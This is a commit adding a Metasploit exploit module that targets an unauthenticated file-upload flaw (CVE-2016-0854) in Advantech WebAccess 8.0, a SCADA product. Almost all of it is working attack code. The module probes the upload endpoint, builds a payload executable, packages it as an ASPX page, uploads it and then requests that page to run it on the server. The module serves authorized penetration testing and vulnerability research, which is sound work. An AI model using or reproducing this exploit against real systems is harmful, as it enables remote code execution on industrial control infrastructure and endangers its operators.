Advantech WebAccess Dashboard Viewer Arbitrary File Upload

2016-04-17 11:29:06 +08:00 · 2016-04-17 11:29:06 +08:00 · 32192d3034
parent ce5be22215
commit 32192d3034
1 changed files with 116 additions and 0 deletions
--- a/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
+++ b/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
@ -0,0 +1,116 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Advantech WebAccess Dashboard Viewer Arbitrary File Upload",
      'Description'    => %q{
       This module exploits a arbitrary file upload vulnerability found in Advantech WebAccess 8.0.
       This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations
       of Advantech WebAccess.Authentication is not required to exploit this vulnerability.
       The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within
       the uploadImageCommon function in the UploadAjaxAction script allows unauthenticated callers to
       upload arbitrary code (instead of an image) to the server, which will then be executed under the
       high-privilege context of the IIS AppPool.
       This exploit was successfully tested on Advantech WebAccess 8.0.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'rgod', # Vulnerability discovery
          'Zhou Yu <504137480[at]qq.com>' # MSF module
        ],
      'References'     =>
        [
          [ 'CVE', '2016-0854' ],
          [ 'ZDI', '16-128' ],
          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01']
        ],
       'Platform'      => 'win',
       'Targets'       =>
        [
          ['Advantech WebAccess 8.0', {}]
        ],
       'Privileged'     => false,
       'DisclosureDate' => "Feb 5 2016",
       'DefaultTarget'  => 0))
    register_options(
      [
        Opt::RPORT(80)
      ], self.class)
  end
  def check
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx?AspxAutoDetectCookieSupport=1'),
      'cookie' => 'AspxAutoDetectCookieSupport=1'
    })
    if res && res.code == 200
      Exploit::CheckCode::Detected
    else
      Exploit::CheckCode::Unknown
    end
  end
  def exploit
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx?AspxAutoDetectCookieSupport=1'),
      'cookie' => 'AspxAutoDetectCookieSupport=1'
    })
    unless res && res.code == 200
      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload payload")
    end
    cookie = res.get_cookies
    exe = generate_payload_exe
    aspx = Msf::Util::EXE.to_exe_aspx(exe)
    file_name = "#{Rex::Text.rand_text_alpha(5)}.aspx"
    data = Rex::MIME::Message.new
    data.add_part('uploadFile', nil, nil, 'form-data; name="actionName"')
    data.add_part(aspx, nil, nil, "form-data; name=\"file\"; filename=\"#{file_name}\"")
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri('WADashboard','ajax','UploadAjaxAction.aspx'),
      'cookie' => cookie,
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data' => data.to_s
    })
    if res && res.code == 200 && res.body.to_s =~ /{"resStatus":"0","resString":"\/#{file_name}"}/
      print_good("#{peer} - Payload uploaded successfully")
    else
      fail_with(Failure::UnexpectedReply, "#{peer} - Payload uploaded failed")
    end
    print_status("#{peer} - Executing payload...")
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri('WADashboard',file_name),
      'cookie' => cookie
    })
  end
 end